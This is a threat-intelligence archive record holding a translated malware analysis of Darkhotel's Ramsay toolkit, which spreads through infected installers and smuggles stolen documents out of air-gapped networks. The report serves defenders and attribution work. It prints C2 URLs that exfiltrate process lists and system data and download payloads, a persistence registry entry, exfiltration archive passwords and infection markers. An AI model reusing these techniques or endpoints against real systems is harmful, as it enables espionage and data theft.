{
	"id": "f9d75acb-2ef5-46d0-b36c-7e16aa5b44fd",
	"created_at": "2026-04-06T00:17:57.986051Z",
	"updated_at": "2026-04-10T03:29:58.214273Z",
	"deleted_at": null,
	"sha1_hash": "d13c95c035549df6e296e7e35f1b2be78fba1f49",
	"title": "Analysis of Ramsay components of Darkhotel's infiltration and isolation network",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1444793,
	"plain_text": "Analysis of Ramsay components of Darkhotel's infiltration and\r\nisolation network\r\nArchived: 2026-04-05 22:05:07 UTC\r\n1 Overview\r\nAntiy CERT discovered recent threat activity by the APT organization Darkhotel on April 20, 2020, and\r\ncontinued to follow up with analysis. The analysis report on the Ramsay component used in this penetration of an\r\nisolated network, and its association with the Darkhotel organization, is now published.\r\nThe Darkhotel organization is a state-backed national/regional actor with general capabilities, also known\r\nas Dubnium, Nemim, Tapaoux, APT-C-06, T-APT-02, etc. It was first disclosed by Kaspersky on August 10, 2015.\r\nThe countries it has actively targeted so far are China, North Korea, India, and Japan. In\r\nprevious attacks it has used hijacked WiFi to deliver bait, spear-phishing emails, 0-day and n-day exploits, abuse of digital signatures,\r\nabuse of legitimate (\"white\") programs, and infection of files on USB disks to reach physically isolated networks, among other techniques.\r\nIn this incident, the Darkhotel organization's strategy is to bundle malicious code with legitimate\r\napplications. Previous disclosures about the organization assumed that this bundling strategy was meant to disguise\r\nmalicious code, which belongs to the initial delivery stage of ATT\u0026CK. In fact, the Ramsay\r\ncomponent sample captured recently shows that the malicious code bundled with the legitimate application is an infected\r\nfile rather than a fake decoy. It belongs to the ATT\u0026CK intranet lateral movement stage and is\r\nmainly used to spread malicious code on the isolated network.
There are four reasons for concluding that this\r\nDarkhotel penetration activity targets an isolated network:\r\nFirst, assuming that the target terminals have anti-virus software deployed, the file-infection method is easy to\r\ndetect, yet hunting for active samples found no further samples, indicating that\r\nDarkhotel's activity is limited to specific targets;\r\nSecond, most application installation packages used in office scenarios come from shared-disk downloads or\r\ntrusted sharing between colleagues, especially in isolated-network scenarios, where it is impossible to download from\r\nthe application's official website;\r\nThird, in earlier disclosures about Darkhotel, missing components were downloaded through\r\nPowerShell, but the analysis of this Darkhotel activity involves no network requests or download behavior;\r\nFourth, this Darkhotel activity is not based on network-protocol C2, but on custom file-transfer control\r\ninstructions. When Ramsay scans an infected document brought into the isolated network environment, it reads the\r\ncorresponding instruction and executes the corresponding payload object, which spreads on the isolated\r\nnetwork as an attack weapon.\r\nThrough correlation analysis, the payload of Darkhotel's initial delivery phase was captured.\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 1 of 36\n\nFigure 1-1 The ATT\u0026CK mapping corresponding to the penetration by the Ramsay component of the Darkhotel\r\norganization\r\nThe operation involves 28 technical points in 10 stages. The specific technical behaviors are described in the\r\nfollowing table.\r\nTable 1-1 Description of the specific technical behavior of the penetration by the Ramsay component of the\r\nDarkhotel organization\r\n2 Malicious code analysis\r\n2.1 Analysis of infected software\r\nThe timestamp of the infected software is March 4, 2020.
It appears to be disguised as an installation package of\r\nthe well-known compression software 7Zip. Considering the Trojan's PE-infection mechanism, this bait is most likely\r\na normal 7Zip installation package from the victim's network that was infected by Ramsay v2, not the initial bait.\r\nFigure 2-1 Infected software icon\r\nThe release principle of the Ramsay v2 Trojan is as follows:\r\nThe Installer structure is responsible for finding the location of the 4 special marks in the bait itself, extracting the\r\nembedded normal 7Zip runner, Dropper and normal 7Zip installation package, releasing them to a temporary directory\r\nand running them:\r\nFigure 2-2 Schematic diagram of the decoy installation package\r\nThe normal 7Zip runner is responsible for running the normal 7Zip installation package, so that an interactive\r\ninterface pops up in the foreground.\r\nFigure 2-3 The normal 7Zip installation interface pops up\r\nDropper is responsible for releasing the subsequent series of functional components:\r\nAfter Dropper runs, it first checks whether it needs to create the\r\n\"%APPDATA%\\\\Microsoft\\\\UserSetting\\\\\" directory, then checks whether its command-line parameter is\r\n\"gQ9VOe5m8zP6\", and then starts to release multiple functional components.
The way Dropper releases components is\r\ndifferent from the 7Zip decoy, and more direct: starting from a specified offset within Dropper itself, it reads a\r\nspecified number of bytes, restores the first two bytes to the MZ header, and finally writes the result to the specified\r\nlocation.\r\nThe embedded components are listed below; which ones are released depends on the system environment:\r\nTable 2-1 Each functional component\r\nThe following are examples of the core functional components:\r\n\"bindsvc.exe\" component\r\nThis component is responsible for infecting EXE programs on non-system disks and on intranet network\r\nshares, waiting for the attack target to carry them into the isolated network. The infection result has the same\r\nfile structure as the 7Zip decoy above, but the normal software at the end is replaced by each infected program. The\r\nspecific process is detailed in Chapter 3.\r\n\"msfte.dll\" component\r\nThis component comes in 32-bit and 64-bit variants. The attacker named it internally \"Ramsay\".\r\nOperation mode: \"msfte.dll\" hijacks the system service \"WSearch\" from the system32 directory, so it is loaded\r\nand run by the system program \"SearchSystemHost.exe\" with SYSTEM privileges.\r\nThe main functions are divided among the exported functions DllEntryPoint(), AccessDebugTracer() and AccessRetailTracer():\r\n2.1.1 Export function: DllEntryPoint()\r\n1. Obtain the local hardware GUID.\r\n2. Release the script \"%APPDATA%\\\\Microsoft\\\\Word\\\\winword.vbs\" to extract plain text from the user's recent\r\nWord documents.\r\nFigure 2-4 Extract text from the user's recent Word documents\r\n3.
Steal the user's recent documents:\r\nRelease the official WinRAR program and use it to encrypt and package the shortcuts of the user's recent files:\r\n%APPDATA%\\\\Microsoft\\\\Windows\\\\Recent\\\\*.lnk (shortcuts to files recently accessed by the user)\r\nThe packaging password is: PleaseTakeOut6031416!!@@##\r\n4. Check whether it is running inside the process \"HYON.exe\", \"BON.exe\" or \"Cover.exe\"; which software these correspond to\r\nhas not been determined. The attacker also gave the \"msfte.dll\" component the internal name\r\n\"Ramsay\", with internal version v8.\r\nFigure 2-5 The internal name of the \"msfte.dll\" component\r\n5. Command control based on custom file-transfer control instructions, see Chapter 3.\r\n2.1.2 Export functions: AccessDebugTracer() and AccessRetailTracer()\r\n1. Inject itself into the explorer.exe process.\r\n2. Write its own version number to \"%APPDATA%\\\\Microsoft\\\\UserSetting\\\\version.ini\"; this time the version is\r\n8.\r\n3. Collect system information, including system version, process list, network connections, network configuration,\r\nrouting information, ARP table, the process calling msfte.dll, network shares, the result of pinging the \"server\" host (which does not exist\r\nnormally), and the hfile.sys system service. This information is encrypted and saved to an .rtt file in the\r\n\"%APPDATA%\\\\Microsoft\\\\UserSetting\\\\MediaCache\\\\\" directory.\r\nFigure 2-6 Collecting system information\r\n4. Collect document files with the suffixes \".txt\", \".doc\" and \".xls\" in the Internet cache directory of the IE\r\nbrowser:\r\n\"%USERPROFILE%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\Temporary Internet Files\\\\Content.IE5\\\\\"\r\n5.
Collect information about each disk, including directory and file lists, disk name, total space, and remaining\r\nspace.\r\nEnumerate A to Z to collect the information of the existing disks.\r\nCreate a window named \"lua\" and set its lpfnWndProc function to collect information when an external\r\nremovable storage device is connected:\r\nFigure 2-7 Collecting information on external removable storage devices\r\n6. Intranet CVE-2017-0147 vulnerability scan:\r\nCVE-2017-0147 is the Windows SMB information-disclosure vulnerability from the well-known Eternal series. Here the\r\nattacker sends a special packet to Microsoft Server Message Block 1.0 (SMBv1) hosts on the intranet, and only\r\nchecks whether the vulnerability exists and is usable:\r\nFigure 2-8 Sending a vulnerability-scan packet to determine whether the host is vulnerable\r\n7. Intranet shared-directory scanning:\r\nInformation collection: collect the sub-directory and file lists, disk name, total space, and remaining space of\r\nintranet network shares.\r\nFile collection: collect document files with the suffixes \".txt\", \".doc\" and \".xls\" in the network share directories.\r\n8. Load the DLL named \"netmgr_%d.dll\" under the \"%SystemRoot%\\\\System32\\\\Identities\\\\\" directory, where %d ranges from\r\n1 to 9. The DLL is released from the hidden data passed in by the attacker (see Chapter 3, Ramsay's communication\r\nmethod based on file transfer); no instance has been obtained so far:\r\nFigure 2-9 Load netmgr_%d.dll\r\n2.2 Analysis of Vulnerability Exploitation Documents\r\nThe exploit document entered the target's internal network through spear-phishing emails,\r\ndropped VBS scripts in turn through vulnerabilities CVE-2017-0199 and CVE-2017-8570, and added\r\nregistry entries to establish persistence.
The attacker concealed a PE file in a picture, loaded and\r\nran it through the VBS script, and used an open-source tool to bypass UAC. Its main function was to collect the\r\nvictim's system information and external removable storage device information.\r\nThe Ramsay v1 sample does not have the function of infecting normal files, but it does implement custom file-transfer\r\ncontrol commands and exfiltration. Overall, the main purpose of this attack document is\r\nto detect and probe the target network environment.\r\nThe body of the decoy document \"accept.docx\" is blank, and its last save time is May 2, 2019, which is earlier than\r\nthe infected software bait.\r\nThe metadata includes \"제목\" in Korean, which means \"title\":\r\nFigure 2-10 The metadata of the decoy document contains Korean\r\nThe document exploits the CVE-2017-0199 vulnerability; when triggered, it opens the embedded CVE-2017-\r\n8570 exploit document \"afchunk.rtf\".\r\n\"Afchunk.rtf\" executes the released SCT script OfficeTemporary.sct. OfficeTemporary.sct is responsible for\r\nreleasing and executing the VBS script %ALLUSERSPROFILE%\\slmgr.vbs.\r\nslmgr.vbs first adds itself to the Run key of the registry to start at boot:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\slmgr, %ALLUSERSPROFILE%\\slmgr.vbs\r\nIt then extracts the image file \"image1.jpeg\" embedded in the document.
It finds the special mark in the picture data,\r\ndecodes the steganographic PE data that follows, releases it as a randomly named .exe in the %ALLUSERSPROFILE%\r\ndirectory and runs it.\r\nFigure 2-11 Special mark and PE data appended to the picture\r\nThe complete process is as follows:\r\nFigure 2-12 Document decoy execution process\r\nIn-depth analysis of the released randomly named .exe shows that it is an earlier version of the Dropper released by\r\nthe software decoy above.\r\nThere is a lot of overlap in important function code between the two, for example:\r\n· After running, first check whether its own parameter is \"gQ9VOe5m8zP6\".\r\n· Run a set of CMD commands to collect system information.\r\n· Collect information on local and external removable storage devices.\r\n· Load the \"netmgr_%d.dll\" delivered by the attacker, where %d ranges from 1 to 9.\r\n· Steal the shortcuts to the user's recent files.\r\n· Release an open-source script to extract plain text from the user's recent Word documents.\r\n· Use the open-source UACME component to bypass UAC.\r\n· Command control based on file transfer; the instructions and functions are the same.\r\nThe differences of this Dropper are as follows:\r\n· It has fewer functional components:\r\nTable 2-2 Functional components\r\n· Screen capture every 30 seconds.\r\n· When an external removable storage device is connected, in addition to collecting information, it also\r\ncaptures the screen at that moment.\r\n· The password for RAR packaging is PleaseTakeOut!@#\r\n· Command control based on custom file-transfer control instructions, see Chapter 3.\r\n3 Conjecture on breaking through the isolated network\r\n3.1 Conjecture on breaking through the isolated network\r\nThe conjecture about how the attacker breaks through the target's isolated network is based on the threat behavior of
the\r\nmalicious code's functions, rather than on the temporal and spatial association of the malicious code. Darkhotel's activities are\r\nlimited to specific targets. According to the USB data collected by the Ramsay v1 Trojan during the operation,\r\nit was found that there is an isolated network in the target. Because C2 based on a network\r\nprotocol cannot reach the isolated network, the attacker had to develop an isolated-network infection program.\r\nOn the other hand, given that ordinary document files brought out of the isolated network through\r\nremovable devices are not classified, the attacker chooses to scan as many documents inside the isolated network as\r\npossible. Attaching stolen data to ordinary infected documents greatly increases the likelihood that\r\nimportant information will be carried out on a mobile device. At the same time, the attacker keeps the Ramsay v2\r\nTrojan on the isolated network to continue scanning documents. Once a document is found to have been brought\r\ninto the isolated network environment, it reads the corresponding instruction and executes the payload object\r\ncorresponding to that instruction.\r\nThe complete process of the custom file-transfer control instructions:\r\nThe attacker's current position may be on the target's intranet, where it controls a certain number of machines and\r\nfiles on shared directories.\r\nStep 1. Infect a normal EXE file and have it executed through the machine that the victim carries into the isolated\r\nnetwork.\r\nStep 2. Stolen data from the compromised isolated-network machine is appended to the end of a normal\r\nWord document;\r\n1) Word documents with stolen data are carried by the victims out of the isolated network;\r\n2) The attacker finds these Word documents and reads the appended stolen data;\r\nStep 3.
The attacker infects a new Word document, appending commands and execution objects.\r\n1) The Word document is carried by the victim into the isolated network;\r\n2) The appended commands and execution objects are executed on the machine that has already been compromised in the\r\nisolated network;\r\n3) The log of the execution result is also taken out of the isolated network as in step 2.\r\nFigure 3-1 Flowchart of the conjectured breakthrough\r\n3.2 Code analysis of breaking through the isolated network\r\nThe attacker's means of breaking through the isolated network is to infect the EXE files on the local non-system\r\ndisk and in the shared directories of the intranet (especially on removable storage devices) to form a new bait with\r\nthe same structure as the 7Zip software bait, and then hope that the attack target carries it into the externally\r\nisolated network environment on a mobile storage device and runs it.\r\nFigure 3-2 Normal EXE file infection process\r\nThe structure template of a completed infection is shown in the figure below. The special mark\r\n\"9J7uQTqgTxhqHaGUue5caaEr3KU\" at the end of the file marks completion and avoids repeated\r\ninfection.\r\nFigure 3-3 Structure template after infection\r\nCommunication method: based on file-transfer control instructions\r\nThe attacker chose to transfer data through office files to break through network isolation. We suspect that this\r\nmay be based on the attack target's office habit of frequently carrying document files in and out of the isolated\r\nnetwork.\r\nThe specific implementation of the communication can be divided into the 2019 version and the 2020 version.
Take\r\nthe 2019 version as an example:\r\nIncoming instructions and execution objects:\r\nThe attacker can infect the .doc and .docx documents on the victim's host outside the isolated network, and append\r\ninstructions and data to the tail to form the structure in the figure below. When the attack target carries the\r\ninfected document to a machine inside the isolated network, the appended data is read and executed by the Ramsay\r\ncomponent.\r\nFigure 3-4 Appended structure of instruction data\r\nThe custom file-transfer control instructions are as follows:\r\nTable 3-1 Acceptable commands and functions\r\nAfter the instruction has been executed, the appended data is deleted and the infected file is restored.\r\nExfiltration of stolen data:\r\nThis stage takes place on infected machines in the isolated network. The steps are as follows:\r\nStep 1: Search for local .doc and .docx documents that were created or last accessed within 1 month.\r\nStep 2: Use RAR to encrypt and pack the folder where the stolen data is stored; the password is PleaseTakeOut!@#\r\nStep 3: The RAR archive is subjected to another round of custom encryption.\r\nStep 4: Append data to the end of the .doc or .docx document, including the Magic mark, local hardware GUID,\r\nand the encrypted packaged data.
Since the same document file may be infected multiple times, there may be multiple\r\nappended combinations at the end.\r\nFigure 3-5 Appended structure of stolen data\r\nStep 5 (conjecture): Wait for the victim to carry the batch of data-attached documents out of the isolated network and\r\nreach a host or shared directory that has been compromised by the attacker.\r\nStep 6 (conjecture): Based on the fixed Magic value, the attacker periodically searches for files on the compromised\r\nhost or shared directory, finds the batch of documents, and extracts the GUID and secret data of the victim host\r\nappended to the tail to complete the exfiltration.\r\n4 Analysis of sample association and organization attribution\r\n4.1 Sample association\r\nBased on the metadata and exploit characteristics of the \"afchunk.rtf\" attack document contained in\r\n\"accept.docx\", another sample of \"afchunk.rtf\" can be associated:\r\nFigure 4-1 afchunk.rtf contained in \"accept.docx\"\r\nFigure 4-2 The newly associated afchunk.rtf\r\nThe parent of the newly associated \"afchunk.rtf\" is the RAR archive \"Technical\r\nAgreement.rar\".
The overall execution process is as follows:\r\nFigure 4-3 Complete execution process of the associated samples\r\n\"Googleofficechk.sct\" first builds the system's current process list into the following\r\nURL and sends it to C2:\r\nhttp://find-image.com/img/image.php?K=F84hFhfeHUiFQE\u0026test=Base64 encoded process list\r\nFigure 4-4 Get the process list and send it to C2\r\nIt then releases \"svupdate32.exe\" and \"msrvc32.exe\" to the system startup directory.\r\n\"Msrvc32.exe\" is responsible for collecting system information, including the system version, architecture, region,\r\nlanguage, and registered owner, and builds a URL to send this information back to C2:\r\nhttp://win-api-essentials[.]com/package/v2.php?im=000C29A414B2\u0026fg=u\u0026inf=Base64 encoded system\r\ninformation\r\nIt then builds another URL and downloads a file to a randomly named file in the\r\n\"%LOCALAPPDATA%\\Local\\VirtualStore\\\" directory:\r\nhttp://win-api-essentials[.]com/package/v2.php?im=000C29A414B2\u0026fg=d\r\nAlternate C2: http://service.email-126[.]net/box/open.php?se=000C29A414B2\u0026fg=d\r\nFinally, according to the instructions and file names contained in the data returned by C2, the next operation is\r\nperformed on the randomly named file:\r\nTable 4-1 Acceptable commands and functions\r\nRelation between the Ramsay event and DarkHotel's historical Trojans:\r\nAfter comparison, the \"svupdate32.exe\" component, the Trojan of this Ramsay event, and the DropBox-based Trojan program of the DarkHotel organization exposed by Tencent Yujian in January 2019\r\n(eea409bbefee23eb475e4161f06d529a) all share a unique piece of code:\r\nFigure 4-5 \"svupdate32.exe\" shared
code\r\nFigure 4-6 DarkHotel's historical Trojan based on Dropbox\r\nFigure 4-7 netwiz.exe in the Ramsay activity\r\nFigure 4-8 Code shared among the three\r\n4.2 Organizational association\r\nAfter in-depth code comparison, we found many connections between Ramsay and Darkhotel:\r\n1. Algorithm overlap:\r\nThe custom encryption algorithm that Ramsay applies to data before writing it to disk is the same as the algorithm that\r\nQianxin previously disclosed [2] and that the Darkhotel organization has used many times:\r\nFigure 4-9 Ramsay's sample algorithm\r\nFigure 4-10 The algorithm disclosed earlier by Qianxin\r\nThe combination of the two algorithms is also the same; the second has only one more addition step than\r\nthe one already disclosed:\r\nFigure 4-11 The algorithm in this sample\r\nFigure 4-12 The algorithm disclosed by Qianxin\r\n2. Function and technique overlap:\r\nThere is a lot of functional and technical overlap between Ramsay and Darkhotel's historical Trojans, such as:\r\n· Hijacking the system's WSearch service to achieve persistence and obtain SYSTEM privileges.\r\n· Using WinRAR to encrypt and package the stolen files.\r\n· Creating a window named \"lua\" to implement file stealing.\r\n· Collecting the current system information through a set of CMD commands. Most of these commands\r\noverlap and are in the same order.\r\n3. Special mark headers overlap:\r\nThe \"bindsvc.exe\" component uses the following to locate the data header:\r\nFigure 4-13 The mark header of the Ramsay Trojan\r\nA sample from June 2019 can be correlated.
At that time, these three mark headers were still used to locate\r\nthe data position:\r\nFigure 4-14 The mark header of the Darkhotel special Trojan in the past\r\nDuring the analysis of this Darkhotel event, it was observed that different sample payloads use different special marks,\r\nwhich serve to locate the data position. These residual marks have also appeared in\r\nprevious Darkhotel activities. On the time axis, the activities of this event overlap with the previous\r\nactivities. It can be seen that Darkhotel has the ability to iterate rapidly according to changes in the target\r\nenvironment and to update optimized payload code in a timely manner.\r\nFigure 4-15 Evolution timeline of Darkhotel special marks\r\nAfter detailed comparison, this old sample from 2019 is the Darkhotel special Trojan described in the Tencent Security\r\nTeam's report \"Darkhotel's Latest Attack on Chinese Foreign Trade Persons\" in June 2019\r\n[3].\r\nThere is a lot of code overlap with the Darkhotel special Trojan. For example, the check of whether the\r\nbeginning of the data returned by C2 is \"\r\nFigure 4-16 Sample in 2019\r\nFigure 4-17 Samples disclosed by the Tencent security team\r\nThe fields and values of the constructed C2 URL are also exactly the same:\r\nC2 of the 2019 sample:\r\nhttp://service-security-manager[.]com/c50c9f6c-a306-41d0-8d24-bf0c3a5f4a0e/21270.php?\r\nvol=honeycomb\u0026q=4znZCTTa2J24\u0026guid=Local hardware GUID\r\nSample C2 from the Tencent Yujian report:\r\nhttp://game-service[.]org/584e3411-14a7-41f4-ba1d-e203609b0471/6126.php?\r\nvol=honeycomb\u0026q=4znZCTTa2J24\u0026guid=Local hardware GUID\r\n4.
The metadata of some decoy documents includes the Korean words \"제목\" and \"사용자\", which\r\nmean \"title\" and \"user\" respectively:\r\nFigure 4-18 The metadata of the decoy document contains Korean\r\nWhen the author of the decoy document inserted the picture object, the default language of Office was also Korean;\r\n\"그림 3\" means \"Picture 3\":\r\nFigure 4-19 The attacker inserts a picture through the Korean version of Office\r\n5 Summary\r\nIn the analysis of Darkhotel's isolated-network penetration activity, document metadata,\r\nexploit characteristics, Ramsay's special infection marks and other evidence also link it to Darkhotel's related\r\nactivities in recent years, showing the continuity of Darkhotel's attack activities in cyberspace.\r\nAfter identifying a high-value target, the attacker can deploy the attack strategy in time, upgrade the malicious-code infection\r\ntechnology, and improve the overall attack process, highlighting Darkhotel's advanced-persistent-threat attributes.\r\nIn 2019, Antiy released \"Nine Years Resurgence and Reflections of the Stuxnet Incident\" [4], stating that\r\nthe traditional anti-virus engine and threat intelligence have become two complementary mechanisms. The\r\ntraditional anti-virus engine is aimed at detecting and identifying large volumes of malicious code,\r\nand uses deep pre-processing, virtual execution and other mechanisms to deal with malicious-code variants and\r\ntransformations, so in terms of payload detection it has unparalleled depth of recognition and analysis, and also\r\nprovides an accurate judgment mechanism for a large number of payload objects.
In the threat intelligence pyramid,\r\n\"narrow-sense intelligence\" such as hashes, IPs, and domain names sits at the bottom layer: it is\r\neasy to obtain and cheap to apply. It can be easily extracted as an attack indicator by the\r\nanalyzing defender, and can be fed into existing interfaces such as various security devices,\r\nmanagement devices, and protection software. If we compare Darkhotel's isolated-network\r\npenetration activity with the more complex and more complete A2PT Stuxnet, the cost of Darkhotel's implementation\r\nis lower, and the process of delivery, infection, and exfiltration depends more on personnel, but over a\r\nlonger sustained attack cycle there is still the possibility of reaching the goal. At the same time, in this\r\nanalysis of Darkhotel's sample association and organizational attribution, by establishing a reliable basic\r\nidentification capability and response mechanism and analyzing the TTP process and related intelligence of the\r\nDarkhotel organization's evolution, a typical case of combined analysis by detection engine and threat intelligence has\r\nbeen formed.\r\nReferences\r\n[1] It is suspected that the Darkhotel APT organization disclosed targeted attacks against Chinese trade industry\r\nexecutives\r\n[2] Sample analysis of recent activities of the Darkhotel APT gang\r\nhttps://ti.qianxin.com/blog/articles/analysis-of-darkhotel/\r\n[3] \"Darkhotel\" (Darkhotel)'s latest attack on Chinese foreign traders disclosed\r\n[4] Nine-year resurgence and reflections on the Stuxnet incident\r\nhttps://www.antiy.com/response/20190930.html\r\nIOC\r\nSerial number Hashes\r\nSerial number domain name\r\n1 service-security-manager.com\r\n2 find-image.com (registered email: lorinejeans11@mail.ru)\r\n3 win-api-essentials.com\r\n4 service.email-126.net\r\n5 service.email-126.net\r\nSource: https://www.programmersought.com/article/62493896999/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.programmersought.com/article/62493896999/"
	],
	"report_names": [
		"62493896999"
	],
	"threat_actors": [
		{
			"id": "1dadf04e-d725-426f-9f6c-08c5be7da159",
			"created_at": "2022-10-25T15:50:23.624538Z",
			"updated_at": "2026-04-10T02:00:05.286895Z",
			"deleted_at": null,
			"main_name": "Darkhotel",
			"aliases": [
				"Darkhotel",
				"DUBNIUM",
				"Zigzag Hail"
			],
			"source_name": "MITRE:Darkhotel",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b13c19d6-247d-47ba-86ba-15a94accc179",
			"created_at": "2024-05-01T02:03:08.149923Z",
			"updated_at": "2026-04-10T02:00:03.763147Z",
			"deleted_at": null,
			"main_name": "TUNGSTEN BRIDGE",
			"aliases": [
				"APT-C-06 ",
				"ATK52 ",
				"CTG-1948 ",
				"DUBNIUM ",
				"DarkHotel ",
				"Fallout Team ",
				"Shadow Crane ",
				"Zigzag Hail "
			],
			"source_name": "Secureworks:TUNGSTEN BRIDGE",
			"tools": [
				"Nemim",
				"Tapaoux"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2b4eec94-7672-4bee-acb2-b857d0d26d12",
			"created_at": "2023-01-06T13:46:38.272109Z",
			"updated_at": "2026-04-10T02:00:02.906089Z",
			"deleted_at": null,
			"main_name": "DarkHotel",
			"aliases": [
				"T-APT-02",
				"Nemim",
				"Nemin",
				"Shadow Crane",
				"G0012",
				"DUBNIUM",
				"Karba",
				"APT-C-06",
				"SIG25",
				"TUNGSTEN BRIDGE",
				"Zigzag Hail",
				"Fallout Team",
				"Luder",
				"Tapaoux",
				"ATK52"
			],
			"source_name": "MISPGALAXY:DarkHotel",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c0cedde3-5a9b-430f-9b77-e6568307205e",
			"created_at": "2022-10-25T16:07:23.528994Z",
			"updated_at": "2026-04-10T02:00:04.642473Z",
			"deleted_at": null,
			"main_name": "DarkHotel",
			"aliases": [
				"APT-C-06",
				"ATK 52",
				"CTG-1948",
				"Dubnium",
				"Fallout Team",
				"G0012",
				"G0126",
				"Higaisa",
				"Luder",
				"Operation DarkHotel",
				"Operation Daybreak",
				"Operation Inexsmar",
				"Operation PowerFall",
				"Operation The Gh0st Remains the Same",
				"Purple Pygmy",
				"SIG25",
				"Shadow Crane",
				"T-APT-02",
				"TieOnJoe",
				"Tungsten Bridge",
				"Zigzag Hail"
			],
			"source_name": "ETDA:DarkHotel",
			"tools": [
				"Asruex",
				"DarkHotel",
				"DmaUp3.exe",
				"GreezeBackdoor",
				"Karba",
				"Nemain",
				"Nemim",
				"Ramsay",
				"Retro",
				"Tapaoux",
				"Trojan.Win32.Karba.e",
				"Virus.Win32.Pioneer.dx",
				"igfxext.exe",
				"msieckc.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434677,
	"ts_updated_at": 1775791798,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d13c95c035549df6e296e7e35f1b2be78fba1f49.pdf",
		"text": "https://archive.orkl.eu/d13c95c035549df6e296e7e35f1b2be78fba1f49.txt",
		"img": "https://archive.orkl.eu/d13c95c035549df6e296e7e35f1b2be78fba1f49.jpg"
	}
}